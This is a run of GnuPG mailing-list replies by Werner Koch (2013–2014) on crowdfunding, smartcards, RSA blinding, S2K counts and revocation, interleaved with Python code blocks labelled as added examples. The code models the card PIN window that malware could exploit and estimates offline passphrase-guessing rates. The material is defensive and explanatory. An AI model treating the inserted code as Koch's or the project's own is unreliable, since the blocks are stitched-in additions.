GnuPG is a leading cryptography app that protects emails and data from interception. It is developed by a community of Free Software engineers led by Werner Koch. GnuPG is used and recommended by the world’s top security experts, including Bruce Schneier and Phil Zimmermann. It offers best in class privacy free of charge and restriction. Hundreds of companies have integrated GnuPG into their products to perform mission critical security, including Red Hat, Deutsche Bahn, and many others.

http://gnupg.org

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: [Announce] GnuPG launches crowdfunding campaign
On Thu, 19 Dec 2013 12:17, christophe.bro...@cnamts.fr said:

> It is not very clear on the website campaign that the completion of the GnuPG 2.1 is in the scope of the campaign.

GnuPG 2.1 will be ready with the new website or even earlier. However, 2.1 won't immediately replace 2.0 (or 1.4) on all platforms; I expect that this takes some time.

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: [Announce] GnuPG launches crowdfunding campaign
On Thu, 19 Dec 2013 13:45, ricu...@gmail.com said:

> As this is about a crypto project, wouldn't it be adequate to accept payments in crypto currencies?

Agreed. However, we don't have the resources to do that. The new infrastructure topic covers payment options and likely we will accept Bitcoins then. The funding platform seems not to support it yet.

Shalom-Salam,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: [Announce] GnuPG launches crowdfunding campaign
On Thu, 19 Dec 2013 14:31, go...@fsfe.org said:

> point. Choosing goteo was IMHO a good idea because their system is Free Software and I don't know if they even support BTC et al.

Indeed. After all crowd funding is about community building and thus I consider it the Right Thing to help each other. Goteo is mainly used in Spain but it is worth getting better known. Agreed, there are a couple of problems, like missing translations, but Goteo has evolved enough since we first looked at it in September to assume that the remaining problems will soon be fixed. The privacy policy and the terms of service are not translated to English - this is an unfortunate oversight of us.

Shalom-Salam,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: [Announce] GnuPG launches crowdfunding campaign
On Thu, 19 Dec 2013 17:35, j...@berklix.com said:

> You might want to suggest to goteo.org it might be quicker for them to use a translator engine then hand correct, rather than translate type all?

A reason might be that they have concerns publishing a translation if not done by a lawyer. However, the half-translated TOS would contradict this assumption.

> I only know of 2 free translators so far, listed on my http://www.berklix.eu/~jhs/trans/

I bet we will eventually hear about the NSA project to track translation engines.

Shalom-Salam,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: gpg-rsa-key decryption with a mobile
On Thu, 19 Dec 2013 17:54, o...@mat.ucm.es said:

> Since you are mentioned in this webpage, do you know by any chance whether gpgsm is vulnerable in a similar way?

gpgsm uses Libgcrypt and Libgcrypt has employed RSA blinding for a long time now. Thus it is not vulnerable. The reason Libgcrypt has RSA blinding is that it is used by online protocols like TLS where it is easy to mount certain timing attacks in the LAN. With GnuPG these classes of network based attacks are not possible and thus we did not use blinding in GnuPG-1.

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
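The RSA blinding Werner refers to, as an added example that is not Libgcrypt's or GnuPG's code: the private exponentiation is applied to c·r^e for a fresh random r, and r is stripped afterwards, so the operand sequence no longer depends directly on an attacker-chosen ciphertext. The toy primes and message below are constructed for illustration only.

```python
"""RSA decryption with and without blinding (added example; toy-sized
constructed parameters, not Libgcrypt code).

Blinding: pick random r coprime with n, decrypt c' = c * r^e mod n,
then m = c'^d * r^-1 mod n.  Since (c * r^e)^d = m * r^(ed) = m * r,
multiplying by r^-1 recovers m.  The value that goes through the slow
modular exponentiation is now different on every call even for the
same ciphertext, which is what starves a side-channel attacker of
repeatable, attacker-chosen inputs.
"""
import secrets
from math import gcd


def generate_toy_key(p, q, e=65537):
    """Textbook RSA key from two primes (constructed, far too small)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime with phi(n)")
    d = pow(e, -1, phi)
    return n, e, d


def rsa_encrypt(m, pub):
    n, e = pub
    return pow(m, e, n)


def rsa_decrypt_unblinded(c, priv):
    """GnuPG-1 style: the exponentiation operates directly on c."""
    n, d = priv
    return pow(c, d, n)


def blind(c, n, e, rng=secrets.randbelow):
    """Return (c * r^e mod n, r^-1 mod n) for a fresh r in [2, n-1]
    coprime with n.  `rng` is injectable so the self-test can be
    deterministic; production code keeps secrets.randbelow."""
    while True:
        r = rng(n - 2) + 2
        if gcd(r, n) == 1:
            break
    return (c * pow(r, e, n)) % n, pow(r, -1, n)


def rsa_decrypt_blinded(c, priv, pub_e, rng=secrets.randbelow):
    """Libgcrypt style: blind, exponentiate, unblind."""
    n, d = priv
    c_blind, r_inv = blind(c, n, e=pub_e, rng=rng)
    m_blind = pow(c_blind, d, n)      # never sees the raw ciphertext
    return (m_blind * r_inv) % n


if __name__ == "__main__":
    n, e, d = generate_toy_key(104729, 1299709)   # constructed primes
    c = rsa_encrypt(123456789, (n, e))
    print(rsa_decrypt_unblinded(c, (n, d)), rsa_decrypt_blinded(c, (n, d), e))
```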
[Announce] 0x10 years of protecting privacy
Hi,

me lacking the time to write an update of the 10 Years of GnuPG [2], Sam Tuke was kind enough to draft this:

16 Years of protecting privacy
==============================

Today marks 16 years since the first release of GNU Privacy Guard (GnuPG). In that time the project has grown from being a hacker’s hobby into one of the world’s most critical anti-surveillance tools. Today GnuPG stands at the front line of the battle between invasive surveillance and civil liberties.

“Time has proven Free Software [1] to be the most trustworthy defender against companies and governments seeking to undermine citizen privacy” said Werner Koch, GnuPG Founder and Lead Developer. “Although funding our work has not always been easy, the need for universally accessible privacy tools has never been more apparent”.

Some of the world’s top security specialists are now counted among GnuPG users, including Bruce Schneier, Jacob Appelbaum, and Phil Zimmermann, inventor of PGP. This summer the world learned of the extent of Government spying thanks to whistleblowers and journalists communicating using GnuPG encrypted emails. Market leading servers from Red Hat and Debian have built their reputation for security on the foundation of GnuPG-verified software.

“The success of GnuPG’s first crowdfunding campaign, which received 90% of its target in 24 hours, shows a fresh willingness among users to support GnuPG in its 16th year, and points to new opportunities for the project in future” said Sam Tuke, GnuPG Campaign Manager. “The release of GnuPG 2.1 and the launch of a newly designed website later this year will bring GnuPG and its clients for Windows, Mac, Gnu/Linux, and Android to new audiences”.

Over the years GnuPG has kept up to date with new algorithms, such as Elliptic Curve Cryptography, and reactive to new threats, such as key extraction via acoustic monitoring, which was announced two days ago by researchers as GnuPG updates were released, in coordination with developers.

Members remain confident of the future of GnuPG and look forward to facing the privacy threats of tomorrow with community support.

[1] http://fsfe.org/freesoftware/basics/4freedoms.en.html
[2] http://lists.gnupg.org/pipermail/gnupg-announce/2007q4/000268.html

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: Holiday giving
On Thu, 19 Dec 2013 21:39, pe...@digitalbrains.com said:

> PS: By the way, why does goteo.org insist on speaking what looks like Spanish to me? I intended to read the privacy policy, but it insisted on showing me

Right, there is no translation. This has been reported by several contributors. We need to work with Goteo to fix that for the future.

Shalom-Salam,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: resource limit
On Fri, 20 Dec 2013 23:15, akw...@gmail.com said:

> gpg: keyblock resource `/etc/apt/trusted.gpg.d//webupd8team-y-ppa-manager.gpg': resource limit

You, or apt-get, have configured gpg to use more than 40 keyrings. This number is from the current source; it might be a bit lower for older versions - I have not checked. Maybe too many archives in sources.list - I don't know the apt-get code, though.

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: Using sound of CPU to extract RSA Key
On Sun, 22 Dec 2013 19:56, je...@seibercom.net said:

> Has anyone seen this? It seems interesting, but is it accurate?

Sure. Haven't you seen my announcement for 1.4.16? Really cool side-channel attack.

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: New GUI frontend for windows
On Thu, 26 Dec 2013 13:00, je...@seibercom.net said:

> I certainly don't want to start a flame war here; however, if you are so unequivocally anti proprietary software, then why do you even allow a version of your product to be created that will run on it. That is

If you mean why we create software which runs on proprietary operating systems like VMS, AIX, Ultrix, HP/UX, SunOS, Windows, etc., there are two related reasons for it:

In the early days of modern free software, there was no computer which entirely ran on free software. A few hackers worked on making that a reality and succeeded by ~1992 by introducing GNU/Linux and freed BSD systems. Unfortunately by that time the major operating system was Windows which was entirely different to the now free Unix systems. To help people who were forced to use Windows, several software projects were ported to Windows. This helped Windows users to get _some_ freedom back - Mozilla is probably the best known example.

If it sometimes sounds like we are all anti-proprietary software, this is likely caused by the rules the GPL camp imposes on their software. The goal of the GPL and other copyleft licenses is to keep the software free and avoid a re-proprietarization of it.

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
[Admin] modifying quotes (was: Fwd: Rosetta CryptoPad released)
Randolph,

I have to take the admin hat which is something I very rarely do.

On Fri, 27 Dec 2013 10:27, pe...@digitalbrains.com said:

> Goldbug messenger thingy /again/ became CryptoPad thingy and all apostrophes are gone, also in the next sentence.

I don't care about missing apostrophes - that could be explained by a text editor's misfeatures. Please explain why you have been hit by the MiniTrue or apologize for this misbehavior RSN. Such a behaviour can't be tolerated and may be a reason to ban you from this list.

Shalom-Salam,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: deleting secret key not implemented
On Tue, 31 Dec 2013 15:07, ndk.cla...@gmail.com said:

> Maybe I'm missing something... What happens if keys are kept on smartcard?

Deleting the key on the smartcard depends on the smartcard. The ~/.gnupg/private-keys-v1.d/...XX.key for a smartcard based key is only a stub storing the serial number of the card for user convenience (“please insert card no. NNN”).

Shalom-Salam,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: Can't decrypt message encrypted with ECC
On Thu, 2 Jan 2014 18:54, eagleeyes...@yahoo.com said:

> I have created a test ECC 25519 subkey.

You mean using the experimental code in GnuPG master? Don't use it - it is work in progress.

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: USB key form-factor smart-card readers with pinpads?
On Sun, 5 Jan 2014 05:02, sam.ku...@uclmail.net said:

> conventional USB stick-sized readers (e.g. Omnikey 6121) + ID-000

Take care: The Omnikey does not work with free software and 2048 bit or larger keys. Better get a Gemalto or Identive (SCM) reader.

> In group 2 above, the smallest reader I have found online which offers secure PIN entry is the ACR83.

The question is whether this is really helpful. Yes, it protects your PIN but it does not protect the use of your decryption key. Even if the latter would be changed, it would also be quite inconvenient to enter the PIN for each encryption.

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: USB key form-factor smart-card readers with pinpads?
On Sun, 5 Jan 2014 16:18, sam.ku...@uclmail.net said:

>> The question is whether this is really helpful. Yes, it protects your PIN but it does not protect the use of your decryption key.
>
> Please could you elaborate?

To make use of the decryption key the smartcard first requires that a VERIFY command is sent to the card. This is what asks for the PIN. After a successful verification of the PIN the card allows the use of the PSO Decrypt command until a power down or a reset operation. Thus an attacking malware only needs to trick you into decrypting an arbitrary message and is then free to use the smartcard without having the reader ask you again for a PIN.

For the signature key we have this forcesig command which switches the card into a mode which requires a VERIFY command before each PSO Sign command. There is also the signature counter to tell you how often the signature key has been used. But for the other two keys we don't have such features.

Shalom-Salam,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: V3 key lookup
On Sun, 5 Jan 2014 17:48, nicholas.c...@gmail.com said:

> Thanks Werner for making your error messages so clear.

David did this and most other parts of the keyserver code.

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: no valid subkey
On Mon, 6 Jan 2014 11:09, erik.hjalmar.josefs...@gmail.com said:

> reason I subscribed is that icedove says I have no valid subkey to my two registered email addresses:

Your encryption subkey expired a month ago.

> A pointer to a beginner's how to fix this would be much appreciated.

  $ gpg --edit-key 0xb240c11d
  gpg> addkey

and then follow the prompts. You probably want to add an RSA encryption subkey of the suggested size. After the key has been generated, enter save and back at the command line send your key to the keyservers:

  gpg --send-key 0xb240c11d

Shalom-Salam,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: USB key form-factor smart-card readers with pinpads?
On Tue, 7 Jan 2014 16:28, sam.ku...@uclmail.net said:

> PSO:DEC but does not define it. That document also mentions PSO:DECRYPT but does not define it. And finally, that document defines PSO: DECIPHER. Are these three terms synonyms, or do they

I guess so.

> 2. I assume that your PSO Decrypt means the same as PSO:Decrypt in the specification document mentioned above. Is this assumption correct?

Yep.

> 3. When you say, a power down or a reset operation, do you mean (a) the card is powered down or reset, or (b) the host computer is powered down or reset, or (c) something else?

With power down I mean that you remove power from the card. Thus the next time you access the card it will do a cold start. By reset I mean a couple of commands. For example selecting a different application or selecting again the OpenPGP app should reset the card state. But you better check the specs.

>> an attacking malware only needs to trick you [into decrypting] an arbitrary message and is then free to use the smartcard without having the reader ask you again for a PIN.
>
> That is somewhat disappointing to me, although perhaps that is because my knowledge is limited and I am simply unaware of a good reason for this behaviour.

Without that you won't like to read a bunch of encrypted mails.

> the card from the reader, or both), would cause subsequent malicious attempts to call PSO Decrypt, to result in failure (at least until the

Right. Most likely the PIN retry counter goes down until the card is locked. Thus attacking malware may easily DoS your card - however malware is commonly not interested in getting noticed by the user. I heard that some pinpad equipped readers have filters for the VERIFY command so that the HOST may not issue a plain VERIFY command to bypass the pinpad.

> I can't find the string PSO Sign in [1]. Are you using it synonymously with PSO: COMPUTE DIGITAL SIGNATURE (and/or PSO:CDS)?

Yep. Apologies for my non-standard compliant terms.

> I can't find the string forcesig in [1]. Please can you tell me where it is documented?

See the card HOWTO or try gpg --card-edit, admin, help.

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
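The card behaviour Werner describes in this thread (VERIFY unlocking PSO:DEC until a power down or reset, forcesig demanding a VERIFY before every PSO:CDS, the retry counter and the signature counter), as an added example that models those rules and is not the card's firmware, the OpenPGP card specification or scdaemon code. The single "verified" flag and the retry counter resetting to 3 on a good PIN are simplifications assumed for this model.

```python
"""Model of the OpenPGP card access state discussed above (added
example; a simplified model, not card firmware or GnuPG code).

Rules modelled, all from the thread:
  * VERIFY with the user PIN sets the verified state; a wrong PIN
    decrements the retry counter and at zero the card is locked.
  * PSO:DEC (decrypt) is allowed as long as the verified state holds,
    which lasts until power down or a reset of the application state.
  * PSO:CDS (sign) follows the same rule unless forcesig is set, in
    which case each signature consumes the verification.
  * The signature counter increments on every successful PSO:CDS.
Simplifications (assumptions of this model): one verified flag serves
both keys, and a good PIN resets the retry counter to 3.
"""
from dataclasses import dataclass


class CardError(Exception):
    """Stands in for an error status word returned by the card."""


@dataclass
class OpenPGPCardModel:
    user_pin: str
    forcesig: bool = False
    retries_left: int = 3
    verified: bool = False
    sig_counter: int = 0

    def verify(self, pin):
        """VERIFY: establish the security status for the user PIN."""
        if self.retries_left == 0:
            raise CardError("card locked: PIN retry counter is 0")
        if pin != self.user_pin:
            self.retries_left -= 1
            self.verified = False
            raise CardError(f"wrong PIN, {self.retries_left} tries left")
        self.verified = True
        self.retries_left = 3          # assumption: counter resets on success

    def reset(self):
        """Power down or re-select the application: forgets the PIN."""
        self.verified = False

    def pso_decrypt(self, ciphertext):
        """PSO:DEC: needs the verified state, does not consume it."""
        if not self.verified:
            raise CardError("security status not satisfied")
        return f"plaintext-of({ciphertext})"      # stand-in for RSA decrypt

    def pso_sign(self, digest):
        """PSO:CDS: with forcesig every signature needs a fresh VERIFY."""
        if not self.verified:
            raise CardError("security status not satisfied")
        self.sig_counter += 1
        if self.forcesig:
            self.verified = False
        return f"signature-of({digest})"


def decrypts_without_new_pin(card, attempts):
    """Defender's view of the risk in the thread: after the user has
    decrypted one message, how many further PSO:DEC calls go through
    without the reader asking for the PIN again?"""
    ok = 0
    for i in range(attempts):
        try:
            card.pso_decrypt(f"msg{i}")
            ok += 1
        except CardError:
            break
    return ok


def signs_without_new_pin(card, attempts):
    """Same question for PSO:CDS; with forcesig the answer is at most 1."""
    ok = 0
    for i in range(attempts):
        try:
            card.pso_sign(f"digest{i}")
            ok += 1
        except CardError:
            break
    return ok
```

A card in forcesig mode still exposes the decryption key this way; what the model offers the defender is the reset call (re-selecting the application) as the way to close the window after a decryption session.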
Re: using an OpenPGP card with Java (keytool and jarsigner)
On Tue, 7 Jan 2014 15:32, h...@guardianproject.info said:

> OpenPGP card as a PKCS11 keystore. It seems that things are close: Java can use NSS as a provider of PKCS11. I guess the question is whether opensc is making a PKCS#11 interface to the OpenPGP card, that's the bit that I don't

Scute also provides a pkcs#11 interface to NSS. Thus you should be able to use it also with Java.

Shalom-Salam,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: GPG Assuan protocol usage
On Wed, 8 Jan 2014 00:30, alan.meek...@gmail.com said:

> D (genkey (rsa (nbits 4096)))

Use

  D (genkey (rsa (nbits 4:4096)))

to match the S-expression syntax. A leading digit denotes a length and thus you can't enter a number without its length. Yes, this is a common pitfall.

Instead of socat, I suggest the use of gpg-connect-agent (which even features a simple script language). If gpg-agent is installed on a system gpg-connect-agent is also available. As an alternative you may also use the Assuan interface of GPGME (see gpa/src/cardman.c for examples).

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
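The length-prefix rule behind Werner's `4:4096` answer, as an added example that is not GnuPG's or Libgcrypt's parser: a small reader for the S-expression notation used on the agent's D line (bare alphabetic tokens, digit-led tokens taken as `length:bytes`) plus the canonical encoder. The error message it raises for `(nbits 4096)` spells out the fix.

```python
"""S-expression reader/writer for gpg-agent style commands (added
example, not GnuPG code).

In this notation a token that starts with a digit is a length prefix:
"4:4096" is the four-byte atom "4096".  A bare "4096" therefore
announces a 4096-byte atom that never arrives, which is why
(genkey (rsa (nbits 4096))) is rejected and (nbits 4:4096) works.
"""


def parse_sexp(data):
    """Parse bytes into nested lists of byte-string atoms."""
    pos = 0

    def skip_ws():
        nonlocal pos
        while pos < len(data) and data[pos:pos + 1].isspace():
            pos += 1

    def parse_atom():
        nonlocal pos
        start = pos
        if data[pos:pos + 1].isdigit():
            # Digit-led token: it MUST be "<length>:<bytes>".
            while pos < len(data) and data[pos:pos + 1].isdigit():
                pos += 1
            digits = data[start:pos].decode()
            if data[pos:pos + 1] != b":":
                raise ValueError(
                    f"offset {start}: '{digits}' is read as a length prefix "
                    f"but no ':' follows; write it as {len(digits)}:{digits}")
            length = int(digits)
            pos += 1
            atom = data[pos:pos + length]
            if len(atom) != length:
                raise ValueError(f"offset {start}: atom truncated, wanted {length} bytes")
            pos += length
            return atom
        # Bare token: runs until whitespace or a parenthesis.
        while pos < len(data) and data[pos:pos + 1] not in (b"(", b")") \
                and not data[pos:pos + 1].isspace():
            pos += 1
        if pos == start:
            raise ValueError(f"offset {pos}: unexpected {data[pos:pos + 1]!r}")
        return data[start:pos]

    def parse_list():
        nonlocal pos
        pos += 1                                   # consume "("
        items = []
        while True:
            skip_ws()
            if pos >= len(data):
                raise ValueError("unterminated list")
            if data[pos:pos + 1] == b")":
                pos += 1
                return items
            items.append(parse_value())

    def parse_value():
        skip_ws()
        if data[pos:pos + 1] == b"(":
            return parse_list()
        return parse_atom()

    result = parse_value()
    skip_ws()
    if pos != len(data):
        raise ValueError(f"offset {pos}: trailing data")
    return result


def canon_encode(obj):
    """Canonical encoding: every atom as <length>:<bytes>, no whitespace.
    Python ints become their decimal digits, so 4096 -> b'4:4096'."""
    if isinstance(obj, (list, tuple)):
        return b"(" + b"".join(canon_encode(x) for x in obj) + b")"
    if isinstance(obj, int):
        obj = str(obj).encode()
    elif isinstance(obj, str):
        obj = obj.encode()
    return str(len(obj)).encode() + b":" + obj
```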
Re: GnuPG 2.0.22 installation on Suse Enterprise 11.3
On Wed, 8 Jan 2014 09:06, spldemou...@gmail.com said:

> I was attempting to upgrade the GnuPG 2.0.9 on the Suse Linux to version 2.0.22 but was hit by some missing dependency. May I know what are the necessary package that I need to install before installing GnuPG 2.0.22?

Running ./configure shows you all missing dependencies.

Shalom-Salam,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: using an OpenPGP card with Java (keytool and jarsigner)
On Wed, 8 Jan 2014 16:26, h...@guardianproject.info said:

> key #3 is for authentication, is there some restriction in the OpenPGP card that would prevent the certificate/key combo in position #3 from being used for signing?

No. At least not enforced by the card or GnuPG.

> What I read there is that in order to use the certificate/key combo in position #3 for decrypting emails, the key in position #2 (decryption) must match the key in position number #3. Is there a similar restriction for signing?

I can't tell because I have not looked at OpenSC for many years.

Shalom-Salam,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: error during make
On Tue, 14 Jan 2014 21:50, glorius.gadu...@ge.com said:

> make: Fatal error: Don't know how to make target `../cipher/libcipher.a'
> Current working directory /orpogdp1/app/proj_software/gnupg-1.4.16/tools

Did you use make -jN? It is possible that a dependency is missing. Or your make is broken. What OS and what compiler are you using?

Workaround:

  (cd cipher && make)
  make

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: using an OpenPGP card with Java (keytool and jarsigner)
On Fri, 17 Jan 2014 02:24, se...@literati.org said:

> Scute works great with Firefox, but keep in mind it requires gpg-agent (or

Sure. That is the whole point of the exercise.

> at least scdaemon). AFAIK it's not intended to work with anything other than Firefox right now. I've been meaning to try it out with wpa_supplicant

Well, it has not been tested with anything else. However, it implements the pkcs#11 interface properly for signature keys and Marcus even came up with a free and readable implementation of the pkcs11 header file.

> The code seems fairly straightforward and it comes with documentation for spying on the PKCS#11 calls to help troubleshoot the implementation, so even if it doesn't work it may not require too much hacking to make it

Right. I would love to see a new maintainer for it. If there are any GnuPG related problems I will for sure help with it.

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: time delay unlock private key.
On Thu, 23 Jan 2014 15:34, o...@mat.ucm.es said:

> It gave you three attempts to log in. If you failed there was a time delay of 20 min, if you failed again, the time delay was prolonged to one hour, and then I think to one day.

IIRC, each CMS user gets his own VM and minidisk. Thus what you mean is the regular login protection most OSes provide. For Unix you configure this in /etc/login.defs. However, GnuPG is a user process and the agent as well as the keys are under the full control of the user. Thus the OS is not able to handle this like the login. After all, why should it. If you are logged in you may do anything with your data - why restrict it.

> My private pgp and smime keys are secured by a password, but there is no time delay, which makes a brute force attack possible.

What is your threat model? Users who are able to access gpg/gpg-agent but are not able to read secring.gpg or private-keys-v1.d? Well, it is possible to do this with SELinux and then such a feature might make sense. However, there is a plethora of other things you need to secure first. In any case if an attacker has access to your machine or at least to your account, you already reached game over state.

Shalom-Salam,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
BoF at FOSDEM ?
Hi!

is anyone interested in a BoF at FOSDEM on February 1 or 2? Anything special to put on the agenda? How long should we plan: 30, 45 or 60 minutes?

I plan to arrive on Saturday by noon which might be a bit too late to sign up for a slot. Thus if there is interest in holding a BoF, I would ask someone else to walk over to the info desk at the H-Building and sign up for a slot on Saturday afternoon or Sunday.

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: time delay unlock private key.
On Thu, 23 Jan 2014 19:20, r...@sixdemonbag.org said:

> Not really, although DKG gave you a good heads-up about the number of iterations in s2k.

FWIW: With GnuPG 2.x the default iteration count is calibrated to an iteration time of 100ms. That is of course machine dependent. To view that count you may run gpg-connect-agent as in this example:

  $ gpg-connect-agent 'getinfo s2k_count' /bye
  D 16777216
  OK

Shalom-Salam,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
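The s2k_count reported above and the brute-force concern raised in the earlier "time delay unlock private key" message, as one added example that is not GnuPG's code: how RFC 4880 packs the iteration count into one octet (which is why 16777216 is such a round number), the iterated-and-salted S2K itself, a calibration loop in the spirit of "about 100 ms per passphrase", and the offline guessing rate that the count, rather than a login-style delay, is what limits. The calibration routine and the hash-rate measurement are this example's own assumptions, not GnuPG's implementation.

```python
"""OpenPGP string-to-key (S2K) iteration count (added example; not
GnuPG's code).

RFC 4880 stores the count in one octet c:
    count = (16 + (c & 15)) << ((c >> 4) + 6)
so only 256 values exist; 16777216 = 16 << 20 is octet 0xE0.
"""
import hashlib
import time

S2K_MIN_COUNT = 16 << 6            # octet 0x00 -> 1024
S2K_MAX_COUNT = 31 << 21           # octet 0xFF -> 65011712


def decode_s2k_octet(c):
    """Expand the one-octet coded count into the number of bytes hashed."""
    if not 0 <= c <= 255:
        raise ValueError("coded count must fit in one octet")
    return (16 + (c & 15)) << ((c >> 4) + 6)


def encode_s2k_count(count):
    """Smallest octet whose decoded count is >= `count` (clamped to 0xFF).

    Rounds up, never down, so a calibrated count does not get weaker
    when it is stored in a key packet.  The coded values increase
    monotonically with c, so the first hit is the right one.
    """
    for c in range(256):
        if decode_s2k_octet(c) >= count:
            return c
    return 255


def iterated_salted_s2k(passphrase, salt, count, hash_name="sha1"):
    """RFC 4880 3.7.1.3: feed salt||passphrase into the hash repeatedly
    until `count` bytes have been hashed; hash the block at least once
    even when count is smaller than the block."""
    block = salt + passphrase
    if not block:
        raise ValueError("empty salt and passphrase")
    total = max(count, len(block))
    h = hashlib.new(hash_name)
    full, rem = divmod(total, len(block))
    for _ in range(full):
        h.update(block)
    h.update(block[:rem])
    return h.digest()


def measure_hash_rate(hash_name="sha1", sample_bytes=1 << 22):
    """Rough bytes-per-second figure for this machine (assumption: a
    4 MiB sample is representative)."""
    block = b"\x5a" * (1 << 16)
    h = hashlib.new(hash_name)
    start = time.perf_counter()
    for _ in range(sample_bytes // len(block)):
        h.update(block)
    h.digest()
    return sample_bytes / max(time.perf_counter() - start, 1e-9)


def calibrate_s2k_octet(target_ms=100, hash_name="sha1"):
    """Coded count such that one S2K run takes about `target_ms` here;
    the same idea as the 100 ms calibration described in the thread."""
    rate = measure_hash_rate(hash_name)
    return encode_s2k_count(int(rate * target_ms / 1000.0))


def guesses_per_second(count, hash_rate):
    """Offline guessing rate against a copied key file: each guess costs
    `count` bytes of hashing, so the count is the only brake once the
    file is in the attacker's hands; a login-style delay in the agent
    would not apply there."""
    return hash_rate / count
```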
Re: Revocation certificates
On Thu, 23 Jan 2014 21:25, ekl...@gmail.com said:

> PS: Please, do not tell me one might have forgotten his passphrase. In this case there is no harm in shredding the secret key and waiting for the expiration

Experience has shown that this is the most common reason why there are so many secret keys on the servers which are useless. Further, an expiration date is not set by default and waiting a year until the key expired is not a good option.

Further, it is also common that a secret key is lost (disk crash - no backup, backup not readable or too old) or simply stolen. This has the same effect as a forgotten passphrase. In particular in the stolen key case, you want to immediately revoke it and not wait until you can restore the key from a backup stored at some safe place.

There are other rare scenarios, for example a high security key in a far away place, you are traveling and you want to immediately revoke the key for whatever reason.

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: Revocation certificates
On Thu, 23 Jan 2014 23:15, ekl...@gmail.com said:

> Oh? I thought the most common reason was test keys, and tutorials which explain step-by-step how to make a keypair and push it on a keyserver, without telling

Obviously, I don't have any hard evidence for the claim that forgotten passphrases are a reason for many unusable keys. However, I have heard too many times statements like “Please don't encrypt to that key; I - uhmm - can't remember my passphrase”.

> And keys with an expiration date are someday deleted, while keys, even revoked, without are never, are they?

No they are not deleted. They are still useful for signature verification. Think about gnupg 1.0.0 which has been signed by a long expired key of mine - verifying it still gives some evidence that the tarball is genuine. The key merely expired. If I had reasons to assume that the key is compromised I would issue a revocation. Verification tools show that.

> BTW, revocation certificates are not produced by default either. So, why not advise people to put an expiration date, instead of counselling them

The reason why they are not generated by default is that I am sure that many people would accidentally publish the revocation. That is not optimal and thus my current plan is to create a revocation by default but modify the armored file so that it can only be imported after editing the file.

> Well, my question is then: Why not restore the key immediately (having stored it at the place you would have stored the revocation certificate), and revoke it then?

The key is of course stored at a bank safe. The sheet/cdrom with the revocation is in the drawer of my desk.

> the usefulness of revocation certificate, just the advice always popping out to generate a revocation certificate in any case, without thinking of whether it would be useful.

Okay, that is a different thing. I plan to change that with a notice saying which file has the edited revocation certificate.

Shalom-Salam,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: BoF at FOSDEM ?
On Thu, 23 Jan 2014 23:28, arne.renkema-pad...@cased.de said:

> Sounds like a good plan. My preference would be the 1st of February around lunch.

Well, the BoF rooms are assigned on a first come first served basis. Thus we can't sign up for a certain time. I am fine with Saturday, but better not before 13:00.

Any topics you want to discuss?

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: BoF at FOSDEM ?
On Fri, 24 Jan 2014 21:14, arne.renkema-pad...@cased.de said:

> My personal pet-problem is the usability of tools like GPG.

Okay, thus we have

 - Report on current keyserver work [Kristian]
 - Make GPG invisible to the user [Arne]
 - ECC and GnuPG progress [Werner]

Shalom-Salam,

   Werner
Re: time delay unlock private key.
On Sat, 25 Jan 2014 10:31, shm...@riseup.net said:

> $ gpg-connect-agent 'getinfo s2k_count' /bye
> ERR 280 not implemented

You are using GnuPG version 2.0.15.

Shalom-Salam,

   Werner
Re: time delay unlock private key.
On Sat, 25 Jan 2014 13:33, shm...@riseup.net said:

>>> $ gpg-connect-agent 'getinfo s2k_count' /bye
>>> ERR 280 not implemented
>> You are using GnuPG version 2.0.15.
> $ gpg2 --version
> gpg (GnuPG) 2.0.22

Gnome-keyring or Seahorse gpg-agent connection hijacking active?

Salam-Shalom,

   Werner
Re: default (secret) key for gpg
On Tue, 28 Jan 2014 17:15, o...@mat.ucm.es said:

> - gpg.conf: default-key 65AD077A
> - options: default-key 65AD077A

Do not use options - it has been replaced by gpg.conf so long ago that I barely remember that file.

> (I even rebooted to restart the gpg-agent). But xemacs, gnus, epg always pick up the old key. I will write to that

Maybe

  (setq mml2015-signer 0x65AD077A)

Shalom-Salam,

   Werner
[Announce] Libgcrypt 1.6.1 released
Hello!

The GNU project is pleased to announce the availability of Libgcrypt version 1.6.1. This is a maintenance release to fix problems found in the recently released 1.6.0 version.

